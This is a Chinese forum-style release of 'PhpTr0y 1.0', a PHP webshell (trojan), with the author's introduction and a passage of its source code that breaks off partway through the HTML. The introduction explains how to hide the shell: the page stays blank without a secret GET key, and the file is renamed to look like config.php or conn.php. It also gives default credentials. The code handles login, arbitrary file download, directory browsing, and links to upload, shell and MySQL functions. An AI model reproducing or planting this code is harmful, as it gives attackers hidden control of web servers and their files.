抛弃了传统的认证方式,改用先获取get值再登陆界面的方式.
如果你运行发现页面空白表示正常,这样隐蔽性会有很大提高.
默认get值为www.chinahacker.info.默认帐户skyfox.默认密码password9.
除了打包类没做以外其它的功能也差不多全了,自己没有时间做了,
其它事也很忙,可能有些bug,如果有的话告诉我,近期没什么时间改.
这个可能是第一个用xhtml输出的php中文木马了.呵呵.
为了尽量让文件小点,我去掉了注释.文件大小大约15K.
如果你需要把文件当作木马用的话,请注意修改文件名称比如.
config.php
conn.php
global.php
如有其它相关问题请联系我QQ53423398.
<?
/*----------------------------------------------------
Php T-r-0*y 1.0 by 天Fox.
ZiBo ShanDong China.
QQ:53423398.
Email:ooofox@msn.com
---------------------------------------------------*/
error_reporting(7);
$tr0yname="skyfox";
$tr0ypass="password9";
$checkmode['soc']="1";
if ( !ini_get('register_globals') )
{
extract($_POST);
extract($_GET);
extract($_SERVER);
extract($_FILES);
extract($_ENV);
extract($_COOKIE);
if ( isset($_SESSION) )
{
extract($_SESSION);
}
}
if ($checkmode['soc']=="1"){
session_start();
if ($_GET['get'] == "logout") {
session_destroy();
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
if ($_SESSION['admin']==$tr0yname && $_SESSION['pass']==$tr0ypass){
$_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;}else{
if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
{
$_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;
}else{
login();
}
}
}
else
{
if ($_GET['get']=="logout"){
setcookie ("admin", "");
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
if (setcookie ("admin",$tr0ypass,time()+(1*24*3600))){
setcookie ("admin",$tr0ypass,time()+(1*24*3600));}else{
if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
{
setcookie ("admin",$tr0ypass,time()+(1*24*3600));
}else{
login();
}
}
}
if(!empty($down)) {
if (!@file_exists($down)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($down);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($down));
@readfile($down);
exit;
}
}
$tr0ypath=str_replace('\\','/',dirname(__FILE__));
if (!isset($dirs) or empty($dirs)) {
$dirs = ".";
$nowpath = getPath($tr0ypath, $dirs);
} else {
$dirs=$_GET['dirs'];
$nowpath = getPath($tr0ypath, $dirs);
}
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "/jishu513556http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html xmlns="/jishu513556http://www.w3.org/1999/xhtml" lang="zh-CN"/>
<head>
<title>PhpTr0y bY 天Fox <? echo "当前系统: ".PHP_OS.""?></title>
<meta http-equiv=Content-Language content="text/html; charset=gb2312" />
<style type="text/css">
body{margin:0px;PADDING:0px;font-family:"Tahoma", Verdana, Lucida, Arial, Helvetica, 宋体,sans-serif;color:#FFF;font-size:12px;background:#677D92 left top;}
#title{margin:0px;padding:0px 0px 0px 0px;background:#8C0700;width:606px;LINE-HEIGHT:18px;}
#body{margin:0px;padding:0px 0px 0px 0px;width:600px;color:#FFF;background:#556B80;LINE-HEIGHT:150%;text-align:left;border:#768CA3 3px solid;}
#action{width:601px;color:#FFF;padding:0px 0px 0px 5px;background:#8C0700;text-align:left;}
a:link{font-weight:normal;text-decoration:none;color:#FFF;}
a:visited {font-weight:normal;text-decoration:none;color:#FFF;}
a:hover {font-weight:normal;text-decoration:none;color:#FFF;}
a:active {font-weight:normal;text-decoration:none;color:#FFF;}
form{margin:0}
select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double}
input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form)
{
for (var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != 'selectall')
e.checked = form.selectall.checked;
}
}
</SCRIPT>
</head>
<body>
<div align="center">
<div id="title"><a href="http://www.chinahacker.info/" target="new"><b>PhpTr0y1.0</b></a> <a href="<?=$_SERVER['PHP_SELF']?>"><b>返回根目录</b></a> <a href="?get=logout"><b>退出</b></a> <a href="?dir=phpinfo" target="new"><b>Phpinfo()</b></a> <a
href="?dir=shell"><b>Webshell</b></a> <a href="?dir=mysql"><b>Mysql</b></a></div><br />
<div id="body"><div align="left">当前目录位置:<?=$nowpath?>/<br />程序所在位置:<?=$tr0ypath?>/<br />
<form action="" method="get">跳转到指定目录:<input name="dirs" type="text" /><input type="submit" name="dirs" value="确定" /></form>
<form action="" method="post" enctype="multipart/form-data">上传文件到当前位置:<input name="uploadfiles" type="file" /><input
type="submit" name="uploadfile" value="确定"><input type="hi
